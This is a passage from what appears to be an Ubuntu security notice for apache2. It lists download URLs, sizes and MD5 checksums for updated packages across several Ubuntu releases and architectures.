http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 173660 9dd0e108ab4d3382799b29d901bf4502
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 93410 d5d602c75a28873f1cd7523857e0dd80
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 37508 22049e1ea8ea88259ff3f6e94482cfb3
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 263066 43fa2ae3b43c4743c98c45ac22fb0250
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 133484 e70b7f81859cb92e0c50084e92216526
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 860622 6d386da8da90d363414846dbc7fa7f08
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 221470 8c207b379f7ba646c94759d3e9079dd4
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 217132 069cab77278b101c3c4a5b172f36ba9b
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 220968 2f6ba65769fc964eb6dfec8a842f7621
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 172874 89137c84b5a33f526daf3f8b4c047a7e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 173662 23e576721faccb4aef732cf98e2358d4
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 105198 44f9e698567784555db7d7d971b9fce2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 37518 fe7caa2a3cf6d4227ac34692de30635e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 282644 ec0306c04778cf8c8edd622aabb0363c
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.9_powerpc.deb
Size/MD5: 142730 d43356422176ca29440f3e0572678093
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 805078 0f1f6a9b04ad5ce4ea29fd0e44bf18a4
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 211674 eb19532b9b759c806e9a95a4ffbfad9b
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 207344 9e5770a4c94cbc4f9bc8cc11a6a038f1
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 210948 6d1d2357cec5b88c1c2269e5c16724bc
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 172882 d04dd123def1bc4cfbf2ac0095432eea
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 173662 6be46bbb9e92224020da49d657cb4cd4
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 94510 9df6ae07a9218d6159b1eebde5d58606
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 37506 89856bb1433e67fb23c8d34423d3e0a5
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 269070 bf585dec777b0306cd80663c11b020df
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.9_sparc.deb
Size/MD5: 131466 340eaf2d2c1f129c7676a152776cfcf3
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.14.diff.gz
Size/MD5: 141838 37d5c93b425758839cbef5afea5353a2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.14.dsc
Size/MD5: 1381 78c9a13cc2af0dbf3958a3fc98aeea84
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8.orig.tar.gz
Size/MD5: 6125771 39a755eb0f584c279336387b321e3dfc
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.8-1ubuntu0.14_all.deb
Size/MD5: 1929318 d4faaf64c2c0af807848ea171a4efa90
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.8-1ubuntu0.14_all.deb
Size/MD5: 72920 065d63c19b22f0f7a8f7c28952b0b408
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.8-1ubuntu0.14_all.deb
Size/MD5: 6258048 33c48a093bbb868ea108a50c051437cf
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.14_all.deb
Size/MD5: 45850 07a9463a8e4fdf1a48766d5ad08b9a3c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.14_amd64.deb
Size/MD5: 253080 3c6467ee604002a5b8ebffff8554c568
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.14_amd64.deb
Size/MD5: 248676 3c83ce9eb0a27f18b9c3a8c3e651cafa
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.14_amd64.deb
Size/MD5: 252490 cf379a515d967d89d2009be9e06d4833
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.14_amd64.deb
Size/MD5: 205592 af6cb62114d2e70bf859c32008a66433
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.14_amd64.deb
Size/MD5: 206350 9c3d5ef8e55eee98cc3e75f2ed9ffaff
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.14_amd64.deb
Size/MD5: 141660 958585d6391847cd5a618464054f7d37
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.14_amd64.deb
Size/MD5: 803974 76d23bd94465a2f96711dc1c41b31af0
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.14_i386.deb
Size/MD5: 236060 ad4c00dc10b406cc312982b7113fa468
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.14_i386.deb
Size/MD5: 231580 07ae6a192e6c859e49d48f2b2158df40
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.14_i386.deb
Size/MD5: 235308 18a44bbffcebde8f2d66fe3a6bdbab6d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.14_i386.deb
Size/MD5: 205594 73ec71599d4c8a42a69ac3099b9d50cf
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.14_i386.deb
Size/MD5: 206374 c1524e4fa8265e7eaac046b114b8c463
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.14_i386.deb
Size/MD5: 140644 379a125b8b5b51ff8033449755ab87b8
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.14_i386.deb
Size/MD5: 755574 9de96c8719740c2525e3c0cf7836d60b
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.14_lpia.deb
Size/MD5: 235578 0265d4f6ccee2d7b5ee10cfff48fed08
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.14_lpia.deb
Size/MD5: 231234 611499fb33808ecdd232e2c5350f6838
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.14_lpia.deb
Size/MD5: 234738 d7757d2da2e542ce0fdad5994be1d8bd
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.14_lpia.deb
Size/MD5: 205592 c10ac9eb401184c379b7993b6a62cde3
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.14_lpia.deb
Size/MD5: 206358 fc91c0159b096e744c42014e6e5f8909
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.14_lpia.deb
Size/MD5: 141212 f87d5f443e5d8e1c3eda6f976b3ceb06
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.14_lpia.deb
Size/MD5: 749716 86ae389b81b057288ff3c0b69ef68656
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.14_powerpc.deb
Size/MD5: 254134 4337f858972022fa196c9a1f9bb724fb
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.14_powerpc.deb
Size/MD5: 249596 44a6e21ff8fa81d09dab19cab4caffdb
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.14_powerpc.deb
Size/MD5: 253698 f101a1709f21320716d4c9afb356f24f
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.14_powerpc.deb
Size/MD5: 205604 3f4d4f6733257a7037e35101ef792352
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.14_powerpc.deb
Size/MD5: 206386 06402188459de8dab5279b5bfef768fa
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.14_powerpc.deb
Size/MD5: 158390 0acffbdb7e5602b434c4f2805f8dc4d0
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.14_powerpc.deb
Size/MD5: 906022 28c3e8b63d123a4ca0632b3fed6720b5
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.14_sparc.deb
Size/MD5: 237422 5651f53b09c0f36e1333c569980a0eb0
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.14_sparc.deb
Size/MD5: 233152 1165607c64c57c84212b6b106254e885
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.14_sparc.deb
Size/MD5: 236606 bbe00d0707c279a16eca35258dd8f13a
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.14_sparc.deb
Size/MD5: 205598 76afcd4085fa6f39055a5a3f1ef34a43
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.14_sparc.deb
Size/MD5: 206372 5c67270e0a19d1558cf17cb21a114833
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.14_sparc.deb
Size/MD5: 143838 28e9c3811feeac70b846279e82c23430
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.14_sparc.deb
Size/MD5: 765398 92c5b054b80b6258a1c4caac8248a40a
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9-7ubuntu3.5.diff.gz
Size/MD5: 137715 0e8a6128ff37a1c064d4ce881b5d3df9
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9-7ubuntu3.5.dsc
Size/MD5: 1788 5e3c3d53b68ea3053bcca3a5e19f5911
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9.orig.tar.gz
Size/MD5: 6396996 80d3754fc278338033296f0d41ef2c04
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.9-7ubuntu3.5_all.deb
Size/MD5: 2041786 cd1e98fb2064bad51f7845f203a07d79
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.9-7ubuntu3.5_all.deb
Size/MD5: 6538578 32e07db65f1e7b3002aedc3afce1748c
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.9-7ubuntu3.5_all.deb
Size/MD5: 45474 0f1b4fb499af61a596241bd4f0f4d35d
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 254968 f2004f847cc5cbc730599352ad1f7dc6
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 249196 fb001fc4f192e9b8ae1bb7161925413c
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 254360 419b942bad4cf4d959afcfa3ce4314e2
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 208524 0d87bf6acbf1ab5dc48c68debe7c0d26
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 84490 2a4df4b619debe549f48ac3e9e764305
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 82838 215665711684d5b5dd04cdfa23d36462
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 209550 496d387e315370c0cd83489db663a356
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 147762 48061b9015c78b39b7afd834f4c81ae0
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.5_amd64.deb
Size/MD5: 820242 3497441009bc9db76a87fd2447ba433c
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 241376 488812d1a311fd67dafd5b18b6813920
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 236082 9256681808703f40e822c81b53f4ce3e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 240668 2b6b7c11a88ed5a280f603305bee880e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 208532 e0eccceba6cae5fb12f431ff0283a23e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 83922 ea5f69f36e344e493cce5d9c0bc69c46
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 82320 0d9b2f9afff4b9efe924b59e9bb039ea
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 209554 f4e53148ae30d5c4f060d455e4f11f95
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 146596 5ed6a4af9378bacfb7d4a034d9923915
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.5_i386.deb
Size/MD5: 778564 ffd7752394933004094c13b00113b263
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 238358 4955c7d577496ea4f3573345fad028a4
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 232964 76aecf38baba17a8a968329b818ec74a
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 237626 83f32bd08e2e206bbdb9f92cfb1a37e5
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 208528 6672fb116e108687669c89197732fbb0
http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 83870 b8f875f197017aec0fe8203c203065d7
http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 82296 d6724391ed540b351e2b660ba98af1ca
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 209550 263b43fb11c6d954d5a4bf7839e720a4
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 146282 a225b8d0f48e141eea28b2369d4595c0
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.5_lpia.deb
Size/MD5: 766494 454c737e191429c43ad3f28c9e0294a0
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 261510 d3e1155682726cc28859156e647d97b3
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 256082 e49d894a6e9ab612a3cbd2f189ca3d8d
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 260850 bc3cd7677cd630ac00424e73a3a6b343
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 208542 ae1cc6b1323832528ad8f0e7130ec87d
http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 84558 68452b686e89320007e9c5367ce36345
http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 82908 2b8c5fc4bdec1017735dc16eba41d0a6
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 209562 a8da7487e3dcd1bdff008956728b8dd3
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 161030 a5ffe07d5e3050c8a54c4fccd3732263
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.5_powerpc.deb
Size/MD5: 926240 8282583e86e84bd256959540f39a515d
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 246720 e54b4b9b354001a910ec9027dc90b0d2
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 241280 1eea25472875056e34cd2c3283c60171
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 246024 5709e7421814ecfb83fff5804d429971
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 208528 25cdfd0177da7e5484d3d44f93257863
http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec-custom_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 84096 3ffbacffcc23ffc640a2ce05d35437bf
http://ports.ubuntu.com/pool/main/a/apache2/apache2-suexec_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 82470 17d1ca84f9455c492013f4f754a1d365
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 209546 696ef3652703523aea6208a4e51e48f1
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 150932 44c89e0249c85eed09b6f3a6a23db59d
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.9-7ubuntu3.5_sparc.deb
Size/MD5: 783902 773a80d7a85a452016da3b10b1f3ae43
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11-2ubuntu2.5.diff.gz
Size/MD5: 141023 50d6737005a6d4fe601e223a39293f99
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11-2ubuntu2.5.dsc
Size/MD5: 1795 59720f4d7ad291c986d92ec120750c3d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11.orig.tar.gz
Size/MD5: 6806786 03e0a99a5de0f3f568a0087fb9993af9
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.11-2ubuntu2.5_all.deb
Size/MD5: 2219326 d29c903489b894ddf88b23a0fec23e5c
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.11-2ubuntu2.5_all.deb
Size/MD5: 46636 ee03585b00f277ed98c0de07a683317a
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-src_2.2.11-2ubuntu2.5_all.deb
Size/MD5: 6948222 a3505a83c13cf36c86248079127dd84d
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 259028 5e9bddefad4c58c3ef9fd15d7a06988d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 253218 ee1bfbb759ffade3a52a6782e2f4b66d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 258414 8ef063026de9790bac1965427ce1b584
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 213294 09701d434bd102e4205e551b4525afd1
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 214258 e98de48ea01e1132c5f1248a9a018745
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 151140 2f7c7f14b843b2c24de8c67356406449
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 826834 28abdf1c7be886e9be2825d351abaec7
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 87818 670c62615e107920c45893b3377ab2a0
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.5_amd64.deb
Size/MD5: 86094 5a7c68fd37066287b4819cba4cfed1f2
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 245538 952540b7679ebc8d3ffc953f32d3be0f
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 240048 08a7fd4888ffd9188890e57c613c4be7
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 244914 955bb5121da808d44aa994386d90723f
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 213308 dd16143608ff8c41cb2d5cd27212a57e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 214280 1e1f5d6feef40413f823a19126a018e3
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 150046 0769d86d26282d1d31615050ae5b8915
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 784198 8760e9c37147d0472dbbfe941c058829
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 87182 21980cb1035d05f69b857870bbcbc085
http://security.ubuntu.com/ubuntu/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.5_i386.deb
Size/MD5: 85572 6a1b8a5e4cb19e815e88335757b06cf3
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 242386 859ad63822b7e82c81cd6dcaca088c4a
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 236924 200538ce94218c9d8af8532636bfd40a
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 241822 3a3183ea4ee77d2677919d3b698f92a1
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 213286 bf81273b1db0a4a621085171c2b2b421
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 214264 ed278dab71289d2baae2ea409382fbf8
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 149758 75f6e2d7bd1cdfe5b1806062c3c859df
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 773424 c7cdc26051bd9443ae25b73776537fb5
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec-custom_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 87132 32e7ea89c96a0afce7ce1da457d947fb
http://ports.ubuntu.com/pool/universe/a/apache2/apache2-suexec_2.2.11-2ubuntu2.5_lpia.deb
Size/MD5: 85550 1d9b5963aa6ea5c01492ec417ab8510a
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 265476 5d03fe6b2da8de98c876941ff78b066f
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 260478 3e3aeaaf496cc86c62a831c59994c1f2
http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 265154 5eae30e7a33c09b37483f3aab595d0e9
http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 213314 879534ebabbb8be86b606e1800dc9cf8
http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 214286 922033231a6aa67ecca1c400d47f09c1
http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 164444 74faf68f0baeffcd011155ca9b201039
http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.11-2ubuntu2.5_powerpc.deb
Size/MD5: 932416 2911758e4ad1b3b401369621301ea76f
